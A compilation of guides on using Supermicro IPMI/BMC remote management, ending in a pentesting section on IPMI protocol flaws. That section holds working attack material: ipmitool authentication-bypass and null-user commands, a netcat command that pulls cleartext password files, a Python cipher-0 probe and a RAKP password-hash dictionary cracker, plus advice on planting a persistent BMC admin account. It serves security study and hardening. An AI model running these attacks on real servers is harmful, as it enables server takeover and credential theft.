IPMI access from a local network. Quantor is a system integrator. Instructions for working with the web interface in older versions of IPMI firmware

Hello everyone. Today I will explain what an IPMI management port is and how a systems engineer can use it every day to make his life a great deal easier.

IPMI (Intelligent Platform Management Interface) is an interface for remote monitoring and management of the physical state of a server. It is the standards-based counterpart of the well-known IP-KVM devices and of vendor solutions such as HP iLO.

IPMI capabilities

  • remote power-on, power-off and reboot of the server;
  • monitoring of temperatures, voltages and the cooling system;
  • remote attachment of storage media to the server (for example, to install the OS and software);
  • management of user accounts and rights (LDAP and RADIUS are supported);
  • management of the access ports and protection of access with an SSL certificate;
  • configuration of notifications about server operation.

How does the BMC controller work?

Let's look at how the BMC works. The Baseboard Management Controller is the hardware behind remote control and health monitoring of the server. It is a single-chip system, correctly called a System-on-a-Chip (SoC), with its own processor, memory and network interface, and usually its own graphics core for console redirection. Through the interfaces defined by the IPMI standard (sensor buses, power control, the system interface to the host) it reaches the main components of the motherboard. The important property of IPMI is that it does not depend on the operating system of the host server: the BMC runs its own firmware on standby power. Personally, I use IPMI to flash the BIOS of servers and to install the server operating system.


IPMI can also work behind NAT; data centers use this to give customers a way to manage their server, which is useful if it freezes. Keep in mind that forwarding these ports publishes the BMC to the whole Internet, which the pentesting section later in this page argues strongly against: if you must, restrict the forwarding rules to known source addresses or reach the BMC over a VPN. For NAT you will need to forward the following ports (the Supermicro defaults):

  • TCP 80: HTTP
  • TCP 443: HTTPS
  • TCP 5900, 5901: graphical console (KVM)
  • TCP 5120, 5123: virtual media traffic
  • UDP 623: IPMI over LAN (RMCP/RMCP+)

What does an IPMI port look like on servers?

Here is what this management port looks like on a physical Supermicro server. I have highlighted it with an arrow; most often it is located above the USB ports.

Next, everything needs to be configured. I have already described how to set up IPMI on Supermicro servers in the BIOS or through the ipmicfg utility, so I will not repeat it here.

Default password on IPMI

The default login and password for IPMI are ADMIN / ADMIN, in capital letters. Change them before the port is connected to any shared network: default vendor logins are exactly what the hash-dumping tools described later on this page try first.

You will see the page with summary information about the system shown in the picture: an overview of the system, the IP address, the firmware version, the BIOS version, and a preview of the remote console. From here you can immediately turn the server on if it is down; I have used the IPMI interface many times to power a server back on after it was accidentally switched off.

On the hardware information screen, you can view different hardware components to see specifications, etc.

Using the Configuration section you can perform a variety of tasks, including alerts, RADIUS authentication, the network configuration of IPMI itself, SMTP configuration for alerts, IP access control, syslog, etc.

The Remote Control section is one of the more interesting ones, since remote access to the server is most likely what you are using IPMI for in the first place.

In the Remote Control section, the power management menu allows you to:

  • perform a reset;
  • power off immediately;
  • power off gracefully;
  • turn the power on or off.

All of this is very handy when you are troubleshooting remotely or need to power a server off and on.

The Launch SOL menu opens the Serial-over-LAN console.

Virtual Media is an excellent feature too. You can mount virtual media from a Windows share and present it to the server as if it were plugged in directly. The one downside of IPMI here is a 4.7 GB image limit, which may not be enough for some newer server OSes: a VL (volume-licence) ISO of Windows Server 2012 R2 weighs 5.1 GB. A firmware update seems to solve this.

To launch the remote console (Remote Console) in IPMI, click on the preview image; a Java launch file will be downloaded. The browser may complain about it; click "Keep" to confirm the download.

Introduction

Most Firstdedic servers are equipped with an IPMI module, but many users do not pay attention to this option.

IPMI is an acronym for Intelligent Platform Management Interface.

What is this device? It is a module located directly inside the server, with an additional Ethernet connector accessible from outside.

If you lose control of the server, you can go to the specified address, log in, and take action to resolve the problem or gather information about it.

Basically, this module is used to monitor and control functions built into the server hardware: temperature sensors, voltage sensors, power supply status, fan speed, logging, mounting images, etc. These features are available regardless of the processor, operating system or BIOS; management is available even when the server is powered off.

Unfortunately, provisioning of IPMI access has not yet been automated, so access must be requested from technical support.

On request you receive the IP address at which the interface is located, together with the credentials. Access is not full: it is limited to an Operator-level account.

IPMI can be accessed either through a browser or with the IPMIView application. The first requires Java and a browser plugin; the second requires Windows or macOS, or Java for the multi-platform version of IPMIView.

Access via browser

After logging in, the main page opens. From it you can access the IP-KVM (a kind of virtual monitor that transmits the server's video output to the connected client; it is very useful when the network is misconfigured, when installing the OS, or when IP addresses are blocked at the data-center level), see the current state of the server, and turn it on, turn it off or hard-reset it (the Power On, Power Down and Reset buttons in the Power Control via IPMI area).

Clicking the "Refresh Preview Image" button refreshes the preview of the virtual monitor. Clicking on the black screen itself opens the IP-KVM Java client, which gives you keyboard and mouse access to your operating system's interface. For this to work you need Java and the browser plugin installed.

In the Server Health tab of the main menu you can view the server status and get information about fan speed, temperature and voltage.

Access via desktop application

In addition to the browser version, there is also a desktop version, IPMIView, available for Windows, macOS and as a multi-platform Java build.

All the latest versions of IPMI View, as well as documentation, are available on the manufacturer’s official ftp server - ftp://ftp.supermicro.com/utility/IPMIView/.

Unlike the browser client, which is downloaded and launched each time it is used, IPMIView is installed on a PC and simply connects to the required server.

First, add all your servers to the application using the "Add a new system" button (File → New → System).

In the IPMI address field, enter the IP that you received when requesting IPMI access from technical support.

To connect to an IPMI interface after adding it to the IPMI Domain, simply double-click on the saved system.

After clicking the "Login" button and successful authorization, the login window changes slightly: information about the IPMI version appears, and tabs with the available operations appear at the very bottom.

When you open some of the tabs, you will notice the application requesting information from IPMI and displaying it in a more accessible form.

For example, the Sensors tab displays data in graphical form, which is somewhat more visual than the plain numbers of the browser version.

The IPM Device tab will provide access to obtaining information about the server state and managing it: turning off, turning on, rebooting and resetting (Power Down, Power Up, Power Cycle, Reset, respectively).

To close the current session and disconnect from IPMI, select the menu item Session → Close.

All servers we offer for rent are equipped with an IPMI (Intelligent Platform Management Interface) controller, which lets you power the server on and off, connect to it remotely (KVM) with the ability to mount ISO images, and obtain information about its current state.

Using IPMI, you can install the operating system and do the initial setup as soon as the server is issued. Since the IPMI controller is connected with a separate cable and has its own IP address, you can always manage the server remotely, even if you lose access to the OS, without needing physical access.

How to install the OS?

To install the operating system, connect to the server's IPMI in whichever way is convenient: through the web interface or with the IPMIView program. This article describes both options, but we recommend the second.

Web interface

To connect via the web interface, enter your IPMI address in the browser's address bar and log in. You can find the address and credentials in the letter with access to the server or in your personal account. Then go to the Remote Control -> Console Redirection tab and click the Launch Console button.


In the Device 1 section, select ISO File in the Logical Drive Type drop-down list, specify the path to the image on your disk with the Open Image button, then attach the image with the Plug In button.


After connecting the image, reboot your server under Power Control ->


Some servers allow you to connect up to three devices via the Device 2 and Device 3 tabs in the Virtual Media -> Virtual Storage section. This is useful if you need to load additional drivers during installation.

If you are installing Windows on the server, the Ctrl+Alt+Del key combination can be sent from the Macro menu.


IPMIView

To use Supermicro's IPMIView, download it from the official website (your details are requested) or directly from the FTP server: https://www.supermicro.com/wftp/utility/IPMIView/

After installing and running the program, add your server under File - New - System.

In System Name enter the name of your server, and in the IP address field enter the IPMI address from the letter with access to the server or from your personal account. Make sure there are no trailing spaces in the address field and click OK.

In the list on the left, double-click the name of the added server; an authorization window appears. Fill it in with the details from the letter or your personal account and click Login. If the connection succeeds you will see Connected, and additional tabs for managing the server will appear at the very bottom of the window.


To remotely manage the server, go to the KVM Console section and click the Launch KVM Console button.


Further actions are similar to working through

The IPMIView program can also reboot, power on or power off your server from the IPMI Device tab.


There are many technologies and products that help network administrators maximize server uptime, so a common management standard was needed. Today the IPMI standard (Intelligent Platform Management Interface) is one of the most important open standards and is present on all Supermicro platforms.

Most Supermicro motherboards contain a special slot for IPMI 2.0 cards (IPMI over LAN). IPMI makes it possible to manage and recover a server remotely regardless of its state. Communication with the remote management console goes through the built-in network controller. This is a hardware solution independent of the operating system. IPMI 2.0 is a fast and inexpensive way to remotely manage, monitor, diagnose and recover a server.

Since IPMI is completely independent of the operating system, monitoring, management, diagnostics and recovery can be carried out even when the OS is frozen or the server is powered off. IPMI can issue notifications that a component needs attention, which makes it possible to watch the state of the system and react to likely hardware problems before they occur; hardware monitoring also reduces the probability of such problems. In addition, you can detect tampering with the server hardware by configuring IPMI to register chassis intrusion. Security is provided by multi-level rights and passwords together with authentication and link encryption. Some IPMI 2.0 modules support KVM-over-LAN, which makes it possible to log into the operating system on the server remotely and configure it or install and remove programs.

IPMI is easy to use because it usually comes integrated into the server or as a separate device, and, most importantly, it costs nothing extra. It lets you control the system at the moments when software tools are powerless, for example when the OS freezes. IPMI and the existing management tools and methods therefore complement each other perfectly, and effective server management needs both software and hardware resources.

Benefits of IPMI technology

  • Remote control of power supplies, fans, voltages and temperatures regardless of the type and state of the CPU and operating system
  • Logging of current events
  • Support for DOS, BIOS setup, Windows 2003, Linux
  • Control of the chassis buttons: Reset, Power down, Power up
  • Password protection

Altusen IP9001 and IPMI modules: embedded tools for remote computer management

Remote control modules, of which KVM switches are the best known, are usually external devices. But there is another class of devices for remote manipulation of server equipment that is built directly into the controlled object. No system administrator can imagine his work without remote access to the servers he supervises, in two forms: remote monitoring of equipment status and remote execution of administrative functions. Typically these tasks are solved by accessing a text console or a graphical desktop. Remote control can be organized in different ways, the most common being software tools: almost every manufacturer of servers and storage systems ships software for remote status monitoring, notification of critical situations and equipment administration.

Not least important are the remote access tools built into the OS, not to mention third-party products. But sometimes software tools are powerless to fix a problem without direct access to the server. This happens, for example, during a hardware failure, when only a "cold" restart or even a power cycle can correct the situation. In such cases a specialized hardware-and-software solution comes to the rescue: a dedicated controller installed on the motherboard. It is powered from a standby source or even autonomously. It can be reached over a network interface; in addition, there may be another channel through a standalone COM port or a modem. Such a controller has access to the sensors on the motherboard and can also perform a hardware reset and switch the power on and off. These functions are managed from the administrator's workstation, which runs a client that talks to the controllers and allows a group of servers equipped with such modules to be monitored and controlled.

Altusen IP9001

The IP9001 controller is essentially a "computer within a computer". This design gives complete hardware independence from the managed server. Access to the remote node is through a web interface and allows any operation on the serviced computer, including power on/off and hard reset. The device is a PCI controller for remote control over TCP/IP, designed for installation in any computer with the appropriate slot. In fact, the IP9001 is an independent computer with its own IBM PowerPC 405GPr processor, a 400 MHz version of the well-known 405GP, which was produced at 266 and 300 MHz. This processor integrates a PCI interface and SDRAM and Ethernet controllers. Besides the required RAM and ROM, the board has its own ATI Rage XL graphics controller and an RJ-45 Ethernet port for the network connection. Also worth noting is the ability to work over the telephone network with an optional modem module (RJ-11 connector), which helps out when there is no access to the managed node over the local network. The module is also equipped with a decent set of peripheral interfaces, including RS-232 and a USB 2.0 hub. The device can be powered in two ways: from the PCI bus or from an external source, the latter to keep it independent of the managed computer. The remote console gives the operator the full range of capabilities available at the server itself, including Remote Console mode, monitoring of system voltages and temperatures, power on/off and reboot. Support for virtual disk, CD and floppy drives lets you install updates and software and boot the OS from media physically located at the remote workstation. The software supports 64 accounts with separate management access rights for each operator. The device is designed for Windows 2000/2003/XP and Red Hat 8.0 and later.

IPMI (Intelligent Platform Management Interface)

Another type of embedded device, designed exclusively for server platforms, is based on the IPMI set of specifications developed by a group of server hardware companies (Intel, HP, NEC and Dell) for remote monitoring and management. It comprises three specifications: Intelligent Platform Management Interface; Intelligent Platform Management Bus (IPMB); and Intelligent Chassis Management Bus (ICMB). IPMB is the internal interface specification for monitoring and control within a single system; ICMB defines the external interface between IPMI-compatible systems.

IPMI modules, despite their small size, provide full control over the server. Version 1.0 was released in 1998, followed by 1.5, and the 2.0 specification is the current one. The standard is already supported by 171 equipment manufacturers, and the list keeps growing. Version 1.5 was approved in the first quarter of 2001 and already included: monitoring of temperatures, voltages, fan speeds and chassis intrusion sensors; reset and power management; event logging; a watchdog timer; access and notification via COM port and LAN; and dedicated monitoring buses. Version 2.0 was adopted in February 2004 and added Serial Over LAN, packet encryption, internal and external protocols, improved protection against unauthorized access, extensions for monitoring modular systems (blade servers), and tools for building virtual (management-only) networks. Server motherboards on the Intel 7500 platform for the Xeon Prestonia with a 400 MHz bus were equipped with IPMI in the form of the SMC-0001 module, compatible with IPMI 1.5: a small board with a specialized processor and its own COM port, in a form factor similar to SO-DIMM memory modules. Almost all boards on the Intel 7520/7525/7320 platforms, as well as the Intel 7221 for the Pentium 4, carry the AOC-IPMI20-E module, which is already IPMI 2.0 compatible.

IPMI architecture version 2.0. Today this is the main standard adopted by server system developers

On the 7230 server platforms for the Pentium D and the 1U platforms of the 6014P series for the Xeon, a new IPMI card design appeared, with a connector similar to PCI-X x16 but with an "inverted" key. These boards (AOC-1UIPMI-B and AOC-LPIPMI-LANG) are functionally similar to the AOC-IPMI20-E, but the AOC-LPIPMI-LANG carries an additional Intel 82541PI Gigabit network controller. The AOC-LPIPMI-LANG module is designed for a regular or 2U case; the AOC-1UIPMI-B is designed for a 1U case and has no network card (it is available optionally as the separate AOC-1UIPMI-LANG module). By default, the AOC-IPMI20-E uses the first network controller on the motherboard, while the AOC-1UIPMI-B and AOC-LPIPMI-LANG use their own additional one, if installed. When an IPMI module is installed, the firmware matching the motherboard is programmed first, and then the IP address is set. In the operating system the same LAN port can be used in parallel for other needs with an IP address different from the one set for IPMI; as a rule, for security reasons, it is recommended to put the latter on a separate network. To monitor and manage systems with IPMI adapters, the IPMIView20 utility is used; it recognizes adapters of all versions, can find IPMI adapters in a given address range, and can group the detected systems by a chosen criterion. To gain access to a specific server, password authentication is required; IPMI 2.0 uses password control and encryption as well as multi-level access rights. The software for managing servers via IPMI gives the operator not only the basic functions but also monitoring data in a convenient graphical form. The main monitoring and control capabilities provided by IPMI adapters, according to the standard, are: logging system events; monitoring temperatures, voltages, fan speeds and other sensors.
It is possible to reboot, turn the power on or off, and Cycle (power off followed by power on). All these functions are available in two modes: Graceful Power Control, a correct shutdown of the operating system through an agent installed on it (the GPC agent is available only for Windows and Linux), and Chassis Power Control, a hardware reset or power-off. Access to the text console is provided by redirecting it to a COM port and implementing SOL (Serial Over LAN) redirection, which gives access to the text console of the remote server and lets you change, for example, BIOS settings remotely. In the same way you can reach the Windows boot loader menu or the Linux/UNIX text console.

Afterword

The devices described in this review are designed for the same task: to simplify the maintenance of remote systems as much as possible. The main difference between them is the scope of application: while the Altusen IP9001 suits any system, IPMI modules can only be installed in server platforms. Today many vendors strive to include such modules in their systems. For example, on June 15 ATEN International Co. Ltd. announced that its new IPMI firmware solution had been officially selected by Micro-Star International Co. Ltd. (MSI) for its server product line; MSI will integrate the ATEN firmware into its AMD server line to provide customers with the necessary server management functions. Separately, Supermicro is preparing new AOC-SIMLP IPMI 2.0 monitoring and management modules for the Bensley platform, which will have built-in KVM-over-LAN capabilities via IPMI.

The vast majority of modern servers have an IPMI/BMC interface for remote server management. It provides access to a virtual keyboard and the server's screen over TCP/IP. Today we will go over the history of IPMI security research, look at attack vectors, and see how to develop them further using IPMI.

IPMI is a set of specifications that define how to communicate with the controller and what it must provide; all vendors try to adhere to them.
The BMC is the hardware that implements IPMI: a single-board computer (system on a chip) with tentacles into the main sensors. Each vendor chooses its own hardware and how to combine it, which is natural. We will consider all our examples on Integrated Lights-Out (iLO) from Hewlett-Packard (HP). HP iLO is just a BMC/IPMI combination; other vendors have their own names and their own hardware and software implementations, but as a rule it is a single-board computer with an ARM processor and Linux on board.
The main function of such devices is to make administrators' lives simpler and more convenient: there is no need to run to the server and press the Reset button, or to go and see why a new system will not boot. You connect to the IPMI/BMC and do all of this remotely. In addition, you can read the various temperature, voltage and other sensors, which is also quite convenient.


CONTROL

There are several control interfaces:
- the web interface (vendor-specific);
- IPMI over LAN (UDP 623);
- from the operating system installed on the server (provided that the manufacturer's drivers are installed). Software: WMI on Windows, OpenIPMI and ipmitool on Linux.

Everything is clear with the web interface: each vendor decides what it looks like and how to implement it. The second and third interfaces are similar, but the transport is different. With IPMI over LAN, as you might guess, commands are sent over the network to UDP port 623. From the installed system, commands are sent through a device file, usually /dev/ipmi0, which appears after the driver is loaded. The standard utility for talking to IPMI is ipmitool for GNU/Linux, as it is the easiest to use.

WHAT IPMI/BMC GIVES A PENTESTER

Although the report on IPMI/BMC vulnerabilities was published in the summer of 2013, many vulnerable systems remain. IPMI/BMC interfaces of every kind can very often be found through a search engine. Naturally, such systems should not be exposed to the Internet; they are mainly encountered during internal pentests. One of the simplest attack vectors involving these systems is "hijacking" a server through IPMI/BMC.

Once you have administrative access to IPMI/BMC (and, as shown below, that is not hard at all), you can connect via the Virtual Console (aka KVM) and, for example, reset the root password, or boot a LiveCD and dump the hashes of the local users if it is Windows. With enough luck you may even catch a console from which root forgot to log out (this happens very often on virtual machines). Conversely, IPMI can also be used to regain access to the server after a complete reinstallation of the system.
From the host operating system, a user with maximum privileges can talk to the IPMI/BMC through the system interface without a password: no authentication is required at all. An attacker simply creates an administrative IPMI/BMC account; if he later loses access to the server, he goes to the IPMI/BMC and takes back his honestly earned goods. In general, the link between the IPMI/BMC and the main computer has not yet been thoroughly studied; it is an unplowed field for finding bugs and features. Given the number of vendors implementing this in their servers, one can speak of a "rich inner world".

PUBLIC RESEARCH

Dan Farmer was the first to draw attention to the security of IPMI and BMCs, with his full report aptly titled "IPMI: Freight Train to Hell". We will look at the most interesting points from a hacking point of view.
Based on Dan's research, IPMI/BMC vulnerabilities can be divided into two broad categories:

· custom bugs from manufacturers (for example, web interface vulnerabilities);
· IPMI protocol vulnerabilities.

In fact, Dan dug up a lot of interesting things, more on that below.

NULL authentication

Description
The vulnerability allows authentication to be bypassed. It is present only in IPMI 1.5. Exploitation consists of requesting authentication type NONE: if the BMC has that type enabled for the channel, it issues a session without checking any secret. The privileges obtained vary between vendors but are usually maximum.

Vendors
- HP
- Dell
- Supermicro.

Conditions
Open UDP port 623, IPMI 1.5, login of an existing user.

ipmitool -I lan -A NONE -H targetIP bmc guid

IPMI Authentication Bypass via Cipher 0

Description
The vulnerability allows authentication to be bypassed. It appeared with IPMI 2.0, the revision that added encryption. Cipher suite 0 means "no authentication, no integrity, no confidentiality", and a BMC that accepts it opens a fully privileged session anyway. To exploit it you need the login of a valid account, but not its password: any value will do.

Vendors
- HP
- Dell
- Supermicro.

Conditions

Open UDP port 623, IPMI 2.0, login of an existing user.

Metasploit - auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H targetIP -U Administrator -P anypasswordhere user list
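What "cipher suite 0" means on the wire is easiest to see in the Open Session Request itself. The following Python is an added example written for this page, not code from the article, from Metasploit or from ipmitool: it builds an RMCP+ Open Session Request that proposes authentication, integrity and confidentiality algorithm 0, and decodes the Open Session Response to decide whether the BMC accepted that proposal, which is the check ipmi_cipher_zero performs. The packet layout follows the IPMI 2.0 session header and Open Session Request/Response payloads as I know them; the two response packets are constructed for offline testing, not captured from a real BMC; and the status-code names are a subset of the RMCP+ status codes quoted from memory, so treat them as assumptions.

```python
"""Cipher suite 0 probe: build an RMCP+ Open Session Request proposing
"no authentication / no integrity / no confidentiality" and interpret the
Open Session Response, as ipmi_cipher_zero does on the wire."""
import os
import socket
import struct

# RMCP header: version 1.0, reserved, sequence 0xFF (no ACK wanted), class 0x07 = IPMI
RMCP_HEADER = bytes([0x06, 0x00, 0xFF, 0x07])
AUTH_FORMAT_RMCP_PLUS = 0x06            # IPMI 2.0 session header format
PAYLOAD_OPEN_SESSION_REQUEST = 0x10
PAYLOAD_OPEN_SESSION_RESPONSE = 0x11
PRIV_ADMINISTRATOR = 0x04

# RMCP+ status codes carried in the Open Session Response (subset, from memory)
STATUS_NAMES = {
    0x00: "no errors",
    0x04: "invalid authentication algorithm",
    0x0A: "unauthorized role or privilege level",
    0x11: "no cipher suite match with proposed security algorithms",
}


def _algorithm_payload(payload_type: int, algorithm: int) -> bytes:
    # payload type (0 auth, 1 integrity, 2 confidentiality), 2 reserved, length 8, algorithm, 3 reserved
    return struct.pack("<BBBBB3x", payload_type, 0, 0, 8, algorithm)


def build_open_session_request(console_session_id: int, auth_alg: int = 0,
                               integrity_alg: int = 0, confidentiality_alg: int = 0,
                               max_privilege: int = PRIV_ADMINISTRATOR) -> bytes:
    """The default arguments (0, 0, 0) propose cipher suite 0 = RAKP-none / none / none."""
    # message tag, requested max privilege, 2 reserved, remote-console session ID (little-endian)
    payload = struct.pack("<BBHI", 0x00, max_privilege, 0, console_session_id)
    payload += (_algorithm_payload(0, auth_alg)
                + _algorithm_payload(1, integrity_alg)
                + _algorithm_payload(2, confidentiality_alg))
    # IPMI 2.0 session header: auth format, payload type, session ID 0, sequence 0, payload length
    session_header = struct.pack("<BBIIH", AUTH_FORMAT_RMCP_PLUS, PAYLOAD_OPEN_SESSION_REQUEST,
                                 0, 0, len(payload))
    return RMCP_HEADER + session_header + payload


def parse_open_session_response(packet: bytes) -> dict:
    """Decode an Open Session Response; 'cipher_zero_accepted' is the finding a scanner reports."""
    if packet[:4] != RMCP_HEADER:
        raise ValueError("not an RMCP/IPMI packet")
    auth_format, payload_type, _sid, _seq, length = struct.unpack_from("<BBIIH", packet, 4)
    if auth_format != AUTH_FORMAT_RMCP_PLUS or payload_type & 0x3F != PAYLOAD_OPEN_SESSION_RESPONSE:
        raise ValueError("not an RMCP+ Open Session Response")
    body = packet[16:16 + length]
    if len(body) < 36:
        raise ValueError("truncated Open Session Response")
    # tag, status, max privilege, reserved, console session ID, BMC session ID, then 3 x 8-byte algorithm blocks
    _tag, status, max_priv, _res, console_sid, bmc_sid = struct.unpack_from("<BBBBII", body, 0)
    auth_alg, integrity_alg, confidentiality_alg = body[16], body[24], body[32]
    return {
        "status": status,
        "status_name": STATUS_NAMES.get(status, "other/unknown (0x%02x)" % status),
        "max_privilege": max_priv,
        "console_session_id": console_sid,
        "bmc_session_id": bmc_sid,
        "algorithms": (auth_alg, integrity_alg, confidentiality_alg),
        # the BMC agreed to open a session with no authentication at all
        "cipher_zero_accepted": status == 0 and (auth_alg, integrity_alg, confidentiality_alg) == (0, 0, 0),
    }


def probe(host: str, port: int = 623, timeout: float = 3.0) -> dict:
    """Send the cipher 0 proposal to a live BMC over UDP 623 (not exercised offline)."""
    request = build_open_session_request(int.from_bytes(os.urandom(4), "little"))
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (host, port))
        data, _ = sock.recvfrom(512)
    return parse_open_session_response(data)


def _constructed_response(status: int, algorithms=(0, 0, 0)) -> bytes:
    """Constructed sample packets (not captured from a real BMC) for offline testing."""
    body = struct.pack("<BBBBII", 0x00, status, PRIV_ADMINISTRATOR, 0, 0xA0A1A2A3, 0x02000000)
    for payload_type, alg in enumerate(algorithms):
        body += _algorithm_payload(payload_type, alg)
    header = struct.pack("<BBIIH", AUTH_FORMAT_RMCP_PLUS, PAYLOAD_OPEN_SESSION_RESPONSE, 0, 0, len(body))
    return RMCP_HEADER + header + body


SAMPLE_VULNERABLE_RESPONSE = _constructed_response(0x00)   # BMC accepts cipher 0
SAMPLE_HARDENED_RESPONSE = _constructed_response(0x11)     # cipher 0 disabled on the BMC

if __name__ == "__main__":
    for name, pkt in (("vulnerable", SAMPLE_VULNERABLE_RESPONSE), ("hardened", SAMPLE_HARDENED_RESPONSE)):
        print(name, parse_open_session_response(pkt))
```

probe(host) sends the request to a live BMC and returns the same dictionary. A BMC that answers status 0 with algorithms (0, 0, 0) will go on to accept any password for the user named in RAKP message 1. The fix on the BMC side is to disable cipher suite 0 by giving it no maximum privilege; with ipmitool that is done through lan set <channel> cipher_privs, where the first character of the 15-character privilege string corresponds to cipher suite 0 and X means "not allowed".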

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

Description
The vulnerability allows an unauthenticated user to obtain users' password hashes for subsequent brute force. More precisely, in RAKP message 2 the BMC returns an HMAC keyed with the user's password over values the attacker largely chooses, before the client has proven anything, so the "hash" can be attacked offline. The bug is in the IPMI 2.0 specification itself.

Vendors
- HP
- Dell
- Supermicro.

Conditions

Open UDP port 623, IPMI 2.0 and valid user logins.

Metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes
http://fish2.com/ipmi/tools/rak-the-ripper.pl
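The value ipmi_dumphashes retrieves is the Key Exchange Authentication Code from RAKP message 2, and the whole "hash dump" is an offline dictionary attack on it. The Python below is an added example written for this page, not code from the article, Metasploit, John or hashcat: it reconstructs the bytes the BMC authenticates (both session IDs, both random numbers, the BMC GUID, the requested role byte, the user-name length and the user name, in that order), computes the HMAC keyed with the password, emits the salt:hash line hashcat mode 7300 and the $rakp$ line John's jumbo build consume, and runs the dictionary attack. The same computation with an empty user name covers the null-user case described further down, and the sha256 option covers cipher suites 15-17. The exchange values and the word list are constructed, the role byte 0x14 (Administrator with name-only lookup) is what ipmitool and Metasploit send, and the hashcat/John line formats are given as I know them; verify them against the tool you use.

```python
"""Offline recovery of an IPMI 2.0 password from the RAKP message 2
Key Exchange Authentication Code (the "hash" ipmi_dumphashes collects)."""
import hashlib
import hmac
import struct

# Requested privilege byte as sent in RAKP message 1 by ipmitool and Metasploit:
# 0x10 = "name-only lookup" flag, 0x04 = Administrator.
ROLE_ADMIN_NAME_ONLY = 0x14


def rakp2_salt(console_sid: int, bmc_sid: int, console_rand: bytes, bmc_rand: bytes,
               bmc_guid: bytes, role: int, username: str) -> bytes:
    """Fields the BMC authenticates in RAKP message 2, in wire order:
    SIDm (console session ID) | SIDc (BMC session ID) | Rm (console random, 16) |
    Rc (BMC random, 16) | GUIDc (16) | RoleM | ULengthM | UNameM."""
    if len(console_rand) != 16 or len(bmc_rand) != 16 or len(bmc_guid) != 16:
        raise ValueError("random numbers and GUID are 16 bytes each")
    name = username.encode("ascii")            # "" for the null user is legal here
    if len(name) > 16:
        raise ValueError("IPMI user names are at most 16 bytes")
    return (struct.pack("<II", console_sid, bmc_sid) + console_rand + bmc_rand + bmc_guid
            + struct.pack("BB", role, len(name)) + name)


def rakp2_auth_code(password: str, salt: bytes, algorithm: str = "sha1") -> bytes:
    """HMAC over the salt keyed with KUID, the user's password itself (cipher suites 1-2:
    HMAC-SHA1; suites 15-17: HMAC-SHA256). The BMC stores the password zero-padded to
    16 or 20 bytes, which does not change an HMAC, so the raw password is the key."""
    digest = {"sha1": hashlib.sha1, "sha256": hashlib.sha256}[algorithm]
    return hmac.new(password.encode("ascii"), salt, digest).digest()


def to_hashcat_7300(salt: bytes, code: bytes) -> str:
    """hashcat mode 7300 (IPMI 2.0 RAKP HMAC-SHA1) takes salt:hash in hex."""
    return f"{salt.hex()}:{code.hex()}"


def parse_hashcat_7300(line: str) -> tuple:
    salt_hex, code_hex = line.strip().split(":")
    return bytes.fromhex(salt_hex), bytes.fromhex(code_hex)


def to_john_rakp(username: str, salt: bytes, code: bytes) -> str:
    """John the Ripper (jumbo) 'rakp' format, the line ipmi_dumphashes writes out."""
    return f"{username}:$rakp${salt.hex()}${code.hex()}"


def username_from_salt(salt: bytes) -> str:
    """The user name is recoverable from the salt: 56 fixed bytes, role, length, name."""
    length = salt[57]
    return salt[58:58 + length].decode("ascii")


def crack(salt: bytes, code: bytes, wordlist, algorithm: str = "sha1"):
    """Dictionary attack: recompute the auth code per candidate and compare."""
    for candidate in wordlist:
        if hmac.compare_digest(rakp2_auth_code(candidate, salt, algorithm), code):
            return candidate
    return None


# Constructed exchange (not captured from a real BMC): session IDs, nonces and GUID
# are arbitrary; the BMC side "knows" the default password ADMIN for user ADMIN.
SAMPLE_SALT = rakp2_salt(
    console_sid=0xA4A3A2A1, bmc_sid=0x02000000,
    console_rand=bytes(range(0x00, 0x10)), bmc_rand=bytes(range(0x10, 0x20)),
    bmc_guid=bytes(range(0x20, 0x30)), role=ROLE_ADMIN_NAME_ONLY, username="ADMIN")
SAMPLE_CODE = rakp2_auth_code("ADMIN", SAMPLE_SALT)      # what the BMC would send back
SAMPLE_WORDLIST = ["password", "admin", "Administrator", "ADMIN", "root"]   # constructed


def demo() -> str:
    """Round-trip through the hashcat line format and crack the sample exchange."""
    line = to_hashcat_7300(SAMPLE_SALT, SAMPLE_CODE)
    salt, code = parse_hashcat_7300(line)
    return crack(salt, code, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print(to_john_rakp("ADMIN", SAMPLE_SALT, SAMPLE_CODE))
    print("recovered:", demo())
```

The example cracks the page's ADMIN/ADMIN default in a handful of guesses; for an eight-character uppercase-plus-digit iLO password the same HMAC is simply computed up to 36^8 (about 2.8 trillion) times, which is the search the page measures at about half an hour on modest hardware.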

IPMI Anonymous Authentication / Null user

Description
Some call it the null user, others anonymous authentication; some treat these as two vulnerabilities, others as one. By default there is a null/anonymous user whose name is the empty string (""). If "null user" is meant, its password is also empty. If "anonymous authentication" is meant, the password is admin, and the blame lies with IPMI chips running ATEN software.
Dan treats these as two different vulnerabilities in his research, while the Rapid7 write-up no longer mentions the null user at all.

Vendors:

HP
Dell
Supermicro (using IPMI chips with ATEN software).

Conditions

Open UDP port 623.

Metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes
ipmitool -I lanplus -H targetIP -U "" -P "" user list

Supermicro IPMI UPnP Vulnerability

Description
Supermicro firmware runs a UPnP SSDP service on UDP port 1900 which is vulnerable to a buffer overflow.

Vendors
Supermicro.

Conditions
Open UDP port 1900.

Metasploit - exploit/multi/upnp/libupnp_ssdp_overflow
Metasploit - auxiliary/scanner/upnp/ssdp_msearch

Supermicro IPMI Clear-text Passwords

Description
The IPMI 2.0 specification implies that cleartext passwords must be stored somewhere (RAKP uses the password itself as the HMAC key). In Supermicro firmware they live in the files /nv/PSBlock or /nv/PSStore, depending on the firmware version.
In addition, BMC implementations on the Nuvoton WPCM450 expose a service on TCP port 49152 that serves the contents of files in the /nv directory, for example PSBlock, server.pem and so on.

Vendors
· Supermicro.

Conditions
Shell access on the BMC (to read the file directly), or an open TCP port 49152 (for the file-serving service).

cat /nv/PSBlock
echo "GET /PSBlock" | nc targetIP 49152

The vulnerabilities "NULL authentication", "IPMI Authentication Bypass via Cipher 0", "IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval" and "IPMI Anonymous Authentication" all follow from what is written in the IPMI specification.
